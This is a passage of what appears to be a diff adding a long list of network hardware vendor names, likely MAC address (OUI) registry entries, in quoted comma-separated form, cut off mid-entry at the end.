+ "CipherOptics", + "Cohu, Inc., Electronics Division", + "Galaxis Technology AG", + "Mavin Technology Inc.", + "Teledex LLC", + "Unimo Technology Co., Ltd.", + "X.net 2000 GmbH", + "Endesa Servicios, S.l.", + "3J Tech. Co., Ltd.", + "Entise Systems", + "e-generis", + "Hyundai Syscomm, Inc.", + "Ikanos Communications", + "Videx Inc.", + "Telewise Communications, Inc.", + "Epygi Technologies, Ltd.", + "Onity, Inc.", + "Netas", + "Daisy Technologies, Inc.", + "HuMANDATA LTD.", + "SpaceBridge Semiconductor Corp.", + "Visionics Corporation", + "Seranoa Networks Inc", + "Powernet Technologies Corp.", + "Hi-Techniques, Inc.", + "HyunJu Computer Co., Ltd.", + "Beijing Zhongqing Elegant Tech. Corp.,Limited", + "Masstech Group Inc.", + "Omnilux", + "Sanyo Industries (UK) Limited", + "Telecore", + "SecWell Networks Oy", + "Datasoft ISDN Systems GmbH", + "Louis Design Labs.", + "Digital Generation Inc.", + "CacheVision, Inc", + "Macat Optics & Electronics Co., Ltd.", + "ShibaSoku Co.,Ltd.", + "Ophit Co.Ltd.", + "elmegt GmbH & Co. KG", + "Sitecsoft", + "Supercaller, Inc.", + "Loewe Opta GmbH", + "HUBER+SUHNER BKtel GmbH", + "BST GmbH", + "Karam", + "EnerLinx.com, Inc.", + "Toyo-Linx Co., Ltd.", + "CEM Corporation", + "Acorp Electronics Corp.", + "Resources Computer Network Ltd.", + "Uptime Devices", + "OULLIM Information Technology Inc,.", + "EMS Dr. Thomas Wünsche", + "Sorenson Communications", + "ZOOM Networks Inc.", + "Liontech Co., Ltd.", + "Alistel Inc.", + "Corrigent Systems", + "Dowkey Microwave", + "C&S Technology", + "Motion Control Engineering, Inc", + "ST&T Instrument Corp.", + "Alcatel Microelectronics", + "CNet Technology Inc.", + "Le Information Communication Inc.", + "TwinHan Technology Co.,Ltd", + "RouteFree, Inc.", + "Redline Communications Inc.", + "KEB Automation KG", + "telco Informationssysteme GmbH", + "Bitworks, Inc.", + "edgeflow Canada Inc.", + "Coup Corporation", + "eCopilt AB", + "Vbrick Systems Inc.", + "Gcom, Inc.", + "Brain21, Inc.", + "Overture Networks, Inc.", + "Netsys Telecom", + "Bluelon ApS", + "VOIX Corporation", + "Raonet Systems, Inc.", + "ITDevices, Inc.", + "Thinkengine Networks", + "TOA Corporation", + "Creatix Polymedia Ges Fur Kommunikaitonssysteme", + "Colorado Med Tech", + "@pos.com", + "Pco Ag", + "Gamatronic Electronic Industries Ltd.", + "Schleicher GmbH & Co. Relaiswerke KG", + "Unico, Inc.", + "CENiX Inc.", + "Scotty Group Austria Gmbh", + "Nanjing Postel Telecommunications Co., Ltd.", + "Flarion Technologies, Inc.", + "IPFRONT Inc", + "Rhythm Watch Co., Ltd.", + "Chelsio Communications", + "Mecalc", + "Britestream Networks, Inc.", + "Equator Technologies", + "A-Z Inc.", + "Leviton Manufacturing Co., Inc.", + "Ositis Software, Inc.", + "Verint Systems Inc", + "GuangZhou Thinker Technology Co. Ltd.", + "Selea SRL", + "International Data Communications, Inc.", + "Sungil Telecom Co., Ltd.", + "Elrest GmbH", + "GERSTEL GmbH & Co. KG", + "Flexlight Networks", + "Emkay Innovative Products", + "The Nielsen Company", + "European Systems Integration", + "Formac Elektronik GmbH", + "Ametek Power Instruments", + "TOMIS Information & Telecom Corp.", + "Hutchison OPTEL Telecom Technology Co., Ltd.", + "Fujian Newland Computer Ltd. Co.", + "Flash Technology", + "AIDONIC Corporation", + "AT & T Laboratories - Cambridge Ltd", + "Tahoe Networks, Inc.", + "Interactive Objects, Inc.", + "Dateno", + "INNOVI Technologies Limited", + "lesswire AG", + "TELEM GmbH", + "Macrolink, Inc.", + "Smartmatic Corporation", + "Digeo, Inc.", + "Zettamedia Korea", + "Platys Communications", + "IP SQUARE Co, Ltd.", + "CSEE Transport", + "Sanritz Corporation", + "Maxxan Systems, Inc.", + "Intime Corp.", + "ELZET80 Mikrocomputer GmbH&Co. KG", + "Winpresa Building Automation Technologies GmbH", + "Vorne Industries, Inc.", + "Himachal Futuristic Communications Ltd", + "Comtech EF Data Corp.", + "Bitrage Inc.", + "JAL Information Technology", + "IP One, Inc.", + "Interalia Inc.", + "Advent Networks", + "HID Corporation", + "AVT Audio Video Technologies GmbH", + "Flexus Computer Technology, Inc.", + "American Computer & Digital Components, Inc. (ACDC)", + "NeuronNet Co. Ltd. R&D Center", + "NetNearU Corporation", + "Bravara Communications, Inc.", + "Yipee, Inc.", + "GTE Airfone Inc.", + "MIP Telecom, Inc.", + "Young Chang Co. Ltd.", + "Schenck Pegasus Corp.", + "TurboWave, Inc.", + "Real Time Access, Inc.", + "Tiburon Networks, Inc.", + "Photuris, Inc.", + "NextGen Business Solutions, Inc", + "JMP Systems", + "TKH Security Solutions USA", + "Novra Technologies Inc.", + "Fostex Corporation", + "Meisei Electric Co. Ltd.", + "White Rock Networks", + "Dura Micro, Inc.", + "Mesco Engineering GmbH", + "Melco Industries, Inc.", + "IGYS Systems, Inc.", + "Prism Holdings", + "At-Sky SAS", + "Connection Technology Systems", + "Heidelberg Web Systems", + "Blue Ridge Networks, Inc.", + "Vista Imaging, Inc.", + "PSI Nentec GmbH", + "Kongsberg Seatex AS", + "Roax Bv", + "A-Kyung Motion, Inc.", + "INSYS Microelectronics GmbH", + "Aceex Corporation", + "CRONOS S.r.l.", + "FibroLAN Ltd.", + "ClearCube Technology", + "Pacific Instruments, Inc.", + "Airvana, Inc.", + "Resource Data Management Ltd", + "Arbor Technology Corp.", + "Yotta Networks, Inc.", + "Techno Valley, Inc.", + "Solinet Systems", + "Locus, Incorporated", + "Swissvoice Ltd.", + "Alesis Corporation", + "Heuft Systemtechnik GmbH", + "Piltofish Networks AB", + "Digital View Limited", + "Deonet Co., Ltd.", + "NSM Technology Ltd.", + "Japan Cash Machine Co., Ltd.", + "Xycotec Computer GmbH", + "Ario Data Networks, Inc.", + "Disco Corporation", + "Omega Band, Inc.", + "Lincoln Electric Company", + "SJ Tek Co. Ltd", + "Shanghai Broadan Communication Technology Co., Ltd", + "Supreme Magic Corporation", + "KID Systeme GmbH", + "VisionTek, Inc.", + "Siemens Building Technologies AG,", + "Midstream Technologies, Inc.", + "Relax Technology, Inc.", + "Glonet Systems, Inc.", + "Fine Appliance Corp.", + "Japan Control Engineering Co., Ltd.", + "Chip PC Ltd.", + "ANTARA.net", + "Universal Access Technology, Inc.", + "Mavenir Inc.", + "FabiaTech Corporation", + "Jetstream Communications", + "Verity Instruments, Inc.", + "Wirelink Co., Ltd.", + "Adcon Telemetry GmbH", + "Mahi Networks", + "MacroSystem Digital Video AG", + "Eurotherm Controls", + "Quadriga UK", + "Polaroid Corporation", + "Acrowave Systems Co., Ltd.", + "PicoLight", + "Radius Co., Ltd.", + "Hitachi Information & Communication Engineering, Ltd.", + "FreeMs Corp.", + "ASE Technologies, USA", + "ELESIGN Co., Ltd.", + "ARMITEL Co.", + "Telencomm", + "ELANsat Technologies, Inc.", + "Powin Information Technology, Inc.", + "Umezawa Musen Denki Co., Ltd.", + "Kanno Works, Ltd.", + "Sanko Electronics Co., Ltd.", + "Cratos Networks", + "Topcon Positioning Systems, Inc.", + "Clovertech, Inc.", + "Momentum Computer, Inc.", + "MKNet Corporation", + "Mega System Technologies, Inc.", + "Entone, Inc.", + "NextNet Wireless, Inc.", + "Internet Energy Systems, Inc.", + "Comspace Corporation", + "Entra Technology Co.", + "AXCENT Media AG", + "Vodtel Communications, Inc.", + "Scenix Semiconductor, Inc.", + "Metropolitan Area Networks, Inc.", + "Saint Song Corp.", + "Bosung Hi-Net Co., Ltd.", + "PLUS-ONE I&T, Inc.", + "Total Impact", + "Ho Net, Inc.", + "Ericsson Group", + "ILSHin Lab", + "Omega Engineering Inc.", + "Silicon Wave, Inc.", + "Stellcom", + "Metera Networks, Inc.", + "Proscend Communications, Inc.", + "Telsey SPA", + "Ulan", + "ASM Pacific Technology", + "Digital Video Communications, Inc.", + "Chiaro Networks, Ltd.", + "IDIS Co., Ltd.", + "Taiwan Commate Computer, Inc.", + "Iwasaki Information Systems Co., Ltd.", + "Woorigisool, Inc.", + "Logic Innovations, Inc.", + "Occam Networks", + "Amplify Net, Inc.", + "Coriolis Networks", + "Daphne", + "Hokubu Communication & Industrial Co., Ltd.", + "PLcom Co., Ltd.", + "Merix Corp.", + "Workstation AG", + "TeleDream, Inc.", + "Comdial Corporation", + "M.c.c.i", + "E.d.&A.", + "Reliable Controls", + "Core Communications Co., Ltd.", + "TRsystems GmbH", + "eDevice, Inc.", + "CCC Network Systems Group Ltd.", + "Evertz Microsystems Ltd.", + "Avnet, Inc.", + "ask-technologies.com", + "Aviv Infocom Co, Ltd.", + "Lampus Co, Ltd.", + "All-Win Tech Co., Ltd.", + "Network Elements, Inc.", + "Metro-Optix", + "Dtvro", + "ZSK Stickmaschinen GmbH", + "Avision, Inc.", + "Paragon Networks International", + "Cosmo Research Corp.", + "Necsom, Ltd.", + "Calix Networks", + "Senao International Co., Ltd.", + "SETA Corp.", + "Cirilium Corp.", + "Aatr", + "Association of Musical Electronics Industry", + "manroland AG", + "Intersoft Electronics", + "Tc Group A/S", + "Allied Data Technologies", + "Orient Silver Enterprises", + "Electro Industries/Gauge Tech", + "Telematica Sistems Inteligente", + "Komodo Technology", + "X-traWeb Inc.", + "Systeme Lauer GmbH & Co., Ltd.", + "Sitara Networks, Inc.", + "Coach Master International d.b.a. CMI Worldwide, Inc.", + "Kyoto Microcomputer Co., Ltd.", + "LXCO Technologies ag", + "Experience Music Project", + "I2SE GmbH", + "Evr", + "Acromag, Inc.", + "ARK Research Corp.", + "AOpen, Inc.", + "Digital Video Broadcasting", + "S1 Corporation", + "LEUNIG GmbH", + "Shelcad Communications, Ltd.", + "Sendtek Corporation", + "Schneider Electric Japan Holdings Ltd.", + "Yaesu Musen Co., Ltd.", + "PAC Labs", + "Unizone Technologies, Inc.", + "Caly Networks", + "Morrow Technologies Corp.", + "Netiverse, Inc.", + "DSA GmbH", + "Canon Imaging Systems Inc.", + "Esi", + "DResearch GmbH", + "Jetway Information Co., Ltd.", + "Spectrapoint Wireless, LLC", + "Centillium Communications", + "RC Networks, Inc.", + "Mannesmann Ipulsys B.V.", + "Rantic Labs, Inc.", + "AZS Technology AG", + "Phasys Ltd.", + "Times N System, Inc.", + "Garnet Systems Co., Ltd.", + "Unibrain S.a.", + "SIAE-Microelettronica S.p.A.", + "Hoft & Wessel AG", + "Expert Magnetics Corp.", + "IMT - Information Management T", + "Taihan Electric Wire Co., Ltd.", + "IP Video Networks Inc", + "Quantum Bridge Communications", + "Omni Flow Computers, Inc.", + "Cmos Systems, Inc.", + "Shanghai Communication", + "Cyra Technologies, Inc.", + "Schweitzer Engineering", + "Cogent Computer Systems, Inc.", + "Adid Sa", + "Astro Terra Corp.", + "Amber Networks", + "Ol'e Communications, Inc.", + "Inova Corporation", + "Two Technologies, Inc.", + "L-3 Sonoma EO", + "Corning Incorporated", + "Irlan Ltd.", + "Axus Microsystems, Inc.", + "Digitra Systems, Inc.", + "Renesas Technology America, Inc.", + "GE Aviation System", + "Klotz Digital AG", + "CacheFlow, Inc.", + "Opti, Inc.", + "Belkin Components", + "Vega Grieshaber Kg", + "Balthazar Technology Ab", + "Incredible Technologies, Inc.", + "Echelon Corp.", + "Bitronics, Inc.", + "Tek Microsystems, Incorporated", + "Wintriss Engineering Corp.", + "Iowave Inc.", + "Orange Micro, Inc.", + "Eltex of Sweden AB", + "Advantage Century Telecommunication Corp.", + "Seeion Control LLC", + "Univex Microtechnology Corp.", + "American Arium", + "Moreton Bay", + "Strategy & Technology, Limited", + "Rmp Elektroniksysteme Gmbh", + "RTD Embedded Technologies, Inc.", + "Ditech Corporation", + "Ecton, Inc.", + "Otis Elevator Company", + "Spectel Ltd.", + "Prism Video, Inc.", + "Kuzumi Electronics, Inc.", + "Digigram", + "Campio Communications", + "Galileo Technology, Ltd.", + "Yano Electric Co., Ltd.", + "Sega Enterprises, Ltd.", + "Digitek Micrologic S.a.", + "Dctri", + "Mediafire Corporation", + "Menicx International Co., Ltd.", + "Coretronic Corporation", + "Serra Soldadura, S.a.", + "Eseye Design Ltd", + "Dedicated Microcomputers", + "Avionitek Israel Inc.", + "Mactell Corporation", + "Rhk Technology, Inc.", + "Mips Denmark", + "Lanaccess Telecom S.a.", + "Jetcell, Inc.", + "Zoneworx, Inc.", + "Vst Technologies, Inc.", + "Mediastar Co., Ltd.", + "Alaris Medical Systems, Inc.", + "Aerocomm, Inc.", + "Good Way Ind. Co., Ltd.", + "Barconet N.v.", + "Xel Communications, Inc.", + "Nomadix, Inc", + "Phoenix Group, Inc.", + "Kapadia Communications", + "Solari Di Udine Spa", + "Utilicom, Inc.", + "Paradise Innovations (Asia)", + "Vsk Electronics", + "Sigmatek Gmbh & Co. Kg", + "Eis International, Inc.", + "Sbs Technologies,", + "Grundig Ag", + "Acrison, Inc.", + "Amigo Technology Co., Ltd.", + "Veris Industries", + "Loop Telecommunication International, Inc.", + "Horizon Computer", + "Capitol Business Systems, Ltd.", + "Nexo Communications, Inc.", + "Addonics Technologies, Inc.", + "Abit Computer Corporation", + "Delta Computer Systems, Inc.", + "Telkom Sa, Ltd.", + "IQinVision", + "Asita Technologies Int'l Ltd.", + "Bright Star Engineering", + "Safety Management Systems", + "AtecoM GmbH advanced telecomunication modules", + "iBAHN", + "ENGETRON-ENGENHARIA ELETRONICA IND. e COM. LTDA", + "Broadband Access Systems", + "Amano Corporation", + "Aeroflex Laboratories, Inc.", + "Oy Comsel System Ab", + "Xrite Inc", + "Digital Audio Processing Pty. Ltd.", + "Intergon, Inc.", + "CommUnique Wireless Corp.", + "Imagic, Inc.", + "FDK Co., Ltd", + "Gaio Technology", + "E-Tech, Inc.", + "Aloha Networks, Inc.", + "mps Software Gmbh", + "Next Level Communications", + "Unisphere Solutions", + "Protech Systems Co., Ltd.", + "Mediatrix Telecom", + "Simulation Laboratories, Inc.", + "Optim Systems, Inc.", + "Accord Video Telecommunications, Ltd.", + "Janz Computer Ag", + "Acucomm, Inc.", + "Mer Telemanagement Solutions, Ltd.", + "Rohde & Schwarz Gmbh & Co. Kg", + "Raymond And Lae Engineering", + "Telemann Co., Ltd.", + "Proton Electronic Industrial Co., Ltd.", + "Euphonix, Inc.", + "Concur System Technologies", + "Sentry Telecom Systems", + "Elecom Co., Ltd. (Laneed Div.)", + "Telecom Device K.k.", + "Namco Limited", + "Audio Codes Ltd.", + "Indigo Active Vision Systems Limited", + "Rauland-Borg Corporation", + "J. Morita Mfg. Corp.", + "TAINET COMMUNICATION SYSTEM Corp.", + "I-Bus", + "Telestream, Inc.", + "Dvt Corp.", + "Oxford Instruments", + "Argosy Research Inc.", + "Netcore Inc.", + "Ohm Technologies Intl, Llc", + "Alcorn Mcbride Inc.", + "Argon Networks, Inc.", + "TriEMS Research Lab, Inc.", + "Digi-Data Corporation", + "Hermes Electronics Co., Ltd.", + "Mitsubishi Electronics Logistic Support Co.", + "Protocol Technologies, Inc.", + "PictureTel Corp.", + "Coyote Technologies, Llc", + "Computer Technica, Inc.", + "Lasat Networks A/S", + "Cocom A/S", + "Echo Eletric Co. Ltd.", + "A2 Corporation", + "Whitecross Systems", + "Teknema, Inc.", + "Lightning Instrumentation", + "Aware, Inc.", + "Uec Commercial", + "Ishigaki Computer System Co.", + "Laseranimation Sollinger Gmbh", + "Data Transmission Network", + "Ceologic", + "Aten International Co., Ltd.", + "Caradon Trend Ltd.", + "Martinho-Davis Systems, Inc.", + "Willnet, Inc.", + "Intermec Corporation", + "Meridian Technology Corp.", + "Encanto Networks, Inc.", + "Dnpg, Llc", + "Atmosphere Networks", + "Japan Aviation Electronics Industry, Ltd.", + "Sarnoff Corporation", + "Neoparadigm Labs, Inc.", + "Versanet Communications, Inc.", + "InFocus Corporation", + "Sakai System Development Corp.", + "Admtek Incorporated", + "SECURITY DYNAMICS TECHNOLOGIES, Inc.", + "Dimat S.a.", + "Melita International Corp.", + "Aptix Corporation", + "HIMA PAUL HILDEBRANDT GmbH Co. KG", + "LTX-Credence CORPORATION", + "Arlotto Comnet, Inc.", + "Bently Nevada Corp.", + "Phase One Denmark A/S", + "Development Concepts, Inc.", + "Dicna Control Ab", + "Electrosonic Ltd.", + "HESS SB-AUTOMATENBAU GmbH", + "E.E.P.D. GmbH", + "Microslate Inc.", + "A.t.n.r.", + "WebTV NETWORKS, INC.", + "G2 Networks, Inc.", + "Pressure Systems, Inc.", + "Focon Electronic Systems A/S", + "Ing. Giordano Elettronica", + "Screen Subtitling Systems, Ltd", + "Xata", + "Dsc Corporation", + "CORELIS Inc.", + "MegaChips Corporation", + "Cornell University", + "Spc Electronics Corporation", + "Alfatech, Inc.", + "SanCom Technology, Inc.", + "Vina Technologies", + "Unipulse Corp.", + "Ht Communications", + "Kayser-Threde GmbH", + "Perkin-Elmer Incorporated", + "Alteon Networks, Inc.", + "Pentek, Inc.", + "Net2net Corporation", + "Asc X3 - Information Technology Standards Secretariats", + "Network Machines, Inc.", + "Litton/Poly-Scientific", + "Nihon Unisys Limited Co.", + "Pmi Food Equipment Group", + "Digital Video", + "Alerton Technologies, Inc.", + "Loran International Technologies Inc.", + "AIT Austrian Institute of Technology GmbH", + "HE ELECTRONICS, TECHNOLOGIE & SYSTEMTECHNIK GmbH", + "Mitsubishi Wireless Communications. Inc.", + "Keithley Instruments", + "Nextest Communications Products, Inc.", + "Vxl Instruments, Limited", + "Quality Semiconductor", + "Micro/Sys, Inc.", + "Sahara Networks, Inc.", + "Acclaim Communications", + "Pacific Micro Data, Inc.", + "Gradient Technologies, Inc.", + "Power Measurement Ltd.", + "Computadores Modulares Sa", + "Glenayre R&D Inc.", + "Snmp Research Incorporated", + "Channelmatic, Inc.", + "Sotec Co., Ltd", + "Nebula Consultants, Inc.", + "Hitachi Computer Products (America), Inc.", + "Reliable Power Meters", + "Data Device Corporation", + "Perception Technology", + "Gsm-Syntel, Ltd.", + "Ten X Technology, Inc.", + "M.i. Systems, K.k.", + "Angia Communications. Inc.", + "Teltrend Ltd.", + "Coulter Corporation", + "Microsemi Corporation", + "American Technology Labs, Inc.", + "Compact Data, Ltd.", + "Marquip, Inc.", + "MultiMedia LANs, Inc.", + "Email Electronics", + "Fujitsu Nexion, Inc.", + "Kasten Chase Applied Research", + "Tellabs Operations, Inc.", + "Nhc Communications", + "Applied Network Technology", + "Allied Telesis International Corporation", + "Instem Computer Systems, Ltd.", + "Texas Microsystems, Inc.", + "Toshin Electric Co., Ltd.", + "Staubli", + "Spur Products Corp.", + "Ortivus Medical Ab", + "Ameritec Corp.", + "Sotas, Inc.", + "Ovation Systems Ltd.", + "Nkt Elektronik A/S", + "Toronto Microelectronics Inc.", + "Centillion Networks, Inc.", + "Brooktrout Technology, Inc.", + "Dawn Computer Incorporation", + "Inventory Conversion, Inc./", + "EBRAINS Inc", + "Kyosan Electric Mfg. Co., Ltd.", + "AKAI Professional M.I. Corp.", + "Chess Engineering B.v.", + "Advanced Telecommunications Modules, Ltd.", + "Acer Peripherals, Inc.", + "Asimmphony Turkey", + "Paralink Networks, Inc.", + "Spacelabs Medical", + "Garrett Communications, Inc.", + "Pacific Communication Sciences", + "Microcomputer Systems (M) Sdn.", + "Logical Design Group, Inc.", + "Global View Co., Ltd.", + "Showa Electric Wire & Cable Co", + "Inovis Gmbh", + "Gammadata Computer Gmbh", + "Best Power Technology, Inc.", + "Agile Networks, Inc.", + "Eaton Corporation", + "Hybrid Networks, Inc.", + "Daystar Digital", + "Teleprocessing Products, Inc.", + "Isdn Systems Corporation", + "Lapis Technologies, Inc.", + "Apex Data, Inc.", + "Neuron Company Limited", + "Ibr Gmbh", + "TITZE DATENTECHNIK GmbH", + "Actis Computer Sa", + "Bon Electric Co., Ltd.", + "Texas Memory Systems, Inc.", + "Nanomatic Oy", + "Yamatake-Honeywell Co., Ltd.", + "Long Reach Networks Pty Ltd", + "Autec Gmbh", + "Gtech Corporation", + "Mitron Computer Pte Ltd.", + "Orbotech", + "Landings Technology Corp.", + "Wipro Infotech Ltd.", + "Neoproducts", + "Datametrics Corp.", + "Network Communications Corp.", + "Shore Microsystems, Inc.", + "Relia Technolgies", + "United Barcode Industries", + "Dual Enterprises Corporation", + "Xedia Corporation", + "Comelta, S.a.", + "Praim S.r.l.", + "Zcomm, Inc.", + "Telebit Communications Aps", + "Livingston Enterprises, Inc.", + "Daewoo Telecom Ltd.", + "Micro Byte Pty. Ltd.", + "Netrix", + "Dataexpert Corp.", + "Ratoc System Inc.", + "Technology Concepts, Ltd.", + "Lanart Corporation", + "Octothorpe Corp.", + "Osi Plus Corporation", + "Department Of Foreign Affairs", + "Hightech Information", + "Fraser's Hill Ltd.", + "Impulse Technology", + "Dauphin Technology", + "Electronic Theatre Controls", + "The Lynk Corporation", + "Svec Computer Corp.", + "Telebit Corporation", + "Colorgraph Ltd", + "Sea-Ilan, Inc.", + "Fluent, Inc.", + "Lans Technology Co., Ltd.", + "Werbeagentur Jürgen Siebert", + "Morning Star Technologies, Inc", + "Netexpress", + "Quad/Graphics, Inc.", + "Netvantage", + "Vari-Lite, Inc.", + "Ipc Corporation (Pte) Ltd.", + "Tellabs Enterprise, Inc.", + "Telindus Distribution", + "Ositech Communications, Inc.", + "Aptec Computer Systems, Inc.", + "Gcc Technologies,Inc.", + "Alfa, Inc.", + "Telecom Australia/Cssc", + "Micro Craft", + "Toyoda Automatic Loom", + "Group 2000 Ag", + "Janich & Klass Computertechnik", + "Kingstar Technology Inc.", + "Tritec Electronic Gmbh", + "Connection Machines Services", + "Icm Co. Ltd.", + "Adobe Systems, Inc.", + "Taiwan Trading Center Dba", + "Telspec Ltd", + "Gk Computer", + "Ring Access, Inc.", + "Adsoft, Ltd.", + "Hughes Lan Systems", + "Teradata Corporation", + "Mitac International Corp.", + "Roland Dg Corporation", + "Computerm Corporation", + "Microunity Systems Engineering", + "ParTech Inc.", + "Invisible Software, Inc.", + "Udc Research Limited", + "West Australian Department", + "Forks, Inc.", + "N.a.t. Gmbh", + "Combinet", + "Evergreen Systems, Inc.", + "Raster Ops Corporation", + "Seel Ltd.", + "Optimem", + "Garbee and Garbee", + "Societe D'exploitation Du Cnit", + "Kimpsion International Corp.", + "Molecular Dynamics", + "Star Technologies, Inc.", + "Precision Software, Inc.", + "Trigem Computer, Inc.", + "Fuji Electric Co., Ltd.", + "Athenix Corporation", + "Zero One Technology Co. Ltd.", + "Atm Computer Gmbh", + "Comendec Ltd", + "Mcm Japan Ltd.", + "Omnibyte Corporation", + "Fischer And Porter Co.", + "Mikasa System Engineering", + "Opus Systems", + "Microplex Systems Ltd.", + "National Instruments Corp.", + "Frontier Technologies Corp.", + "Intellicom, Inc.", + "Advanced Information", + "Rwt Gmbh", + "Exsceed Corpration", + "Azure Technologies, Inc.", + "Tvs Electronics Ltd", + "Atlantix Corporation", + "Dukane Network Integration", + "Perle Systems Limited", + "Roche Diagnostics International Ltd.", + "Compex", + "Creative Electronic Systems", + "Eagle Technologies Pty.ltd.", + "Supercomputing Solutions, Inc.", + "Adaptive Systems, Inc.", + "Avatar Corporation", + "Northwest Digital Systems, Inc", + "Cnet Technology, Inc.", + "Digital Systems Int'l. Inc.", + "Smt Goupil", + "The Sage Group Plc", + "Integrated Measurement Systems", + "Speed International", + "Microbus Designs Ltd.", + "Stellar Computer", + "Agilis Corporation", + "Novellco De Mexico", + "Nuvotech, Inc.", + "Japan Computer Corp.", + "Microwave Bypass Systems", + "Atari Corporation", + "Esprit Systems", + "Networth Incorporated", + "Anritsu Corporation", + "Synergy Microsystems", + "Practical Peripherals, Inc.", + "Artel Communications Corp.", + "April", + "Network Application Technology", + "Auspex Systems Inc.", + "Clustrix Corporation", + "Compu-Shack Electronic Gmbh", + "Megadata Corp.", + "Research Machines", + "Camex", + "Sony Tektronix Corp.", + "Punch Line Holding", + "Marconi Electronics Ltd.", + "ICANN, IANA Department", + "Css Labs", + "Philips Apeldoorn B.v.", + "Next, Inc.", + "Tri-Data", + "Castelle Corporation", + "Marli S.a.", + "Metier Management Systems Ltd.", + "Linotype-Hell Ag", + "Indata", + "The Droid Works", + "Tecmar Inc.", + "Xerox Corp Univ Grant Program", + "General Dynamics", + "Four Phase Systems", + "Insystec", + "Information Technology Limited", + "Applicon, Inc.", + "Cs Telecom", + "Chipcom Corporation", + "Datahouse Information Systems", + "Computer Consoles Inc.", + "Codex Corporation", + "Ferranti Computer Sys. Limited", + "Orcatech Inc.", + "Cadnetix Corporations", + "Bull S.a.s.", + "Prime Computer Inc.", + "Apollo Computer Inc.", + "General Electric Corporation", + "Britton Lee Inc.", + "Corvus Systems Inc.", + "Ncr Corporation", + "Sitasys AG", + "Bridge Communications Inc.", + "Tiara/ 10Net", + "Pyramid Technology Corp.", + "Bell Atlantic Integrated Syst.", + "Computervision Corporation", + "Symbolics Inc.", + "Unisys", + "Barrister Info Sys Corp", + "Information International, Inc", + "Nanjing Casela Technologies Corporation Limited", + "ekey biometric systems gmbh", + "365mesh Pty Ltd", + "Shenzhen Dingsheng Technology Co., Ltd.", + "Yunke China Information Technology Limited", + "Henan KunLun Technologies CO.,Ltd.", + "Smappee NV", + "Sparnex n.v.", + "Interel Building Automation", + "KLG Smartec", + "Stienen Group", + "JD Cloud Computing Co., Ltd.", + "Sensata Technologies Inc.", + "Relay, Inc.", + "Inogeni", + "LinkData Technology (Tianjin) Co., LTD", + "BBPOS Limited", + "BLiNQ Networks Inc.", + "Wuhan Zmvision Technology Co. Ltd.", + "Qingdao Yuze lntelligent Technology Co.,Ltd", + "Shenzhen Shokzhear Co., Ltd", + "AGOS Co.,Ltd", + "Novus Produtos Eletronicos Ltda", + "SZ Tenveo video technology co., Ltd", + "Shenzhen Intellirocks Tech. Co. Ltd.", + "Shenzhen Giec Digital Co.,Ltd", + "dormakaba USA Inc.", + "Hunan Aimag Intelligent Technology Co.,Ltd", + "NimbleTech Digital Inc.", + "Yoqu Technology (Shenzhen) Co., Ltd.", + "Enda", + "Bosch Automotive Products (Suzhou) Co., Ltd. Changzhou Branch", + "Yoqu Technology(Shenzhen)Co.,Ltd.", + "Vicoretek (Nanjing) Co.,Ltd.", + "Shenzhen Huajuxin Semiconductor Co.,ltd", + "HP Tuners LLC", + "Shanghai Neardi Technologies Co. Ltd.", + "NEXSEC Incorporated", + "Sercomm Japan Corporation", + "creoline GmbH", + "Power Plus Communications AG", + "KanEL Sweden AB", + "Akamai Technologies Inc.", + "Fiber Groep B.V.", + "Boxin Communications Limited Liability Company", + "Shenzhen Baseus Technology Co., Ltd.", + "Horys Technologies Llc", + "EFUN Display Technology (Shenzhen) Co., Ltd.", + "Ningbo Goneo Electric Appliance Co., Ltd.", + "Eckelmann AG", + "Cyviz AS", + "Qingdao Hi-image Technologies Co., Ltd", + "Flextronics Technologies Mexico S De Rl De Cv", + "Suzhou Tesien Technology Co., Ltd.", + "GLBB Japan", + "sysmocom - s.f.m.c. GmbH", + "Shenzhen Zhide technology Co., LTD", + "Shenzhen DOOGEE Hengtong Technology CO.,LTD", + "Kontrolnext Technology (Beijing) Ltd.", + "Flock Safety", + "Flyingvoice (HongKong) Technologies Limited", + "Fanox Electronic S.L.", + "Inovance", + "Shenzhen Glazero Technology Co., Ltd.", + "Shanghai Moorewatt Energy Technology Co.,Ltd", + "shenzhen Qikai Electronic Co., Ltd.", + "DragonWave Technologies DMCC", + "Shenzhen WeSing Interactive Entertainment Technology Co., Ltd", + "IEIT SYSTEMS Co., Ltd.", + "Shenzhen ELINK Technology Co., Ltd.", + "JiangSu Newcom Optical&Electrical Communication CO Ltd", + "EarthCam, Inc.", + "Hanwha NxMD (Thailand) Co., Ltd.", + "Jiangxi Zhentian Technology CO.,LTD", + "Qorvo Utrecht B.V.", + "Inspur Computer Technology Co.,Ltd.", + "Apexsha Smarttech Private Limited", + "Schneider Electric USA", + "i-TEK RFID", + "NevadaNano", + "Shenzhen Shutong Space Technology Co., Ltd", + "Shenzhen Junge Technology Co.,Ltd", + "Shenzhen SDG Telecom Equipment Co.,Ltd.", + "Fortx", + "Vantiva Connected Home - Subcomponents", + "Felion Technologies Company Limited", + "Valeo Interior Controls (Shenzhen) Co.,Ltd", + "Subeca", + "INTENTSECURE Inc.,", + "SystemX Co.,Ltd.", + "Chongqing Zhouhai intelligent technology CO., Ltd", + "Shanghai JINXVM Microelectronics Co.,Ltd.", + "EVS Broadcast Equipment", + "Framework Computer Inc.", + "MICIUS Laboratory", + "Nanjing phx-gctech Information Technology Co., Ltd", + "Elkor Technologies Inc.", + "Terahop Pte.ltd.", + "ikeja wireless (pty) ltd", + "Beijing China Electronics Intelligent Acoustics Technology Co.,Ltd", + "Jlztlink Industry(ShenZhen)Co.,Ltd.", + "Genbyte Technology Inc.", + "Shenzhen Pinsu Zhilian Information Technology Co.,Ltd.", + "Hangzhou Sciener Smart Technology Co., Ltd.", + "Marquardt India Pvt Ltd", + "Vialis BV", + "Aigentec Technology(Zhejiang) Co., Ltd.", + "Jollyboys Ltd", + "Xiamen Yeastar Digital Technology Co., Ltd", + "Vola Networks Inc.", + "Shenzhen Yinwang Intelligent Technologies Co.,Ltd.", + "Senao Networks Inc.", + "iFlight Technology Company Limited", + "Opentext", + "Convey India Private Limited", + "Sixi Networks Co., Ltd", + "Ecliptic Enterprises Corp", + "MediaTek Inc", + "Genuine Optics", + "Axon Enterprise, Inc.", + "Rivos Inc.", + "Tactrix Inc.", + "PLAUD Inc.", + "Finder SpA", + "Richard Wolf GmbH", + "Shanghai StarFive Semiconductor Co., Ltd.", + "Rawasi Co", + "Continetal Automotive Systems Sibiu", + "Anhui Guoke Ruidian communication technology Co.,Ltd.", + "Shenzhen MoreSense Technology Co., Ltd.", + "Bosch 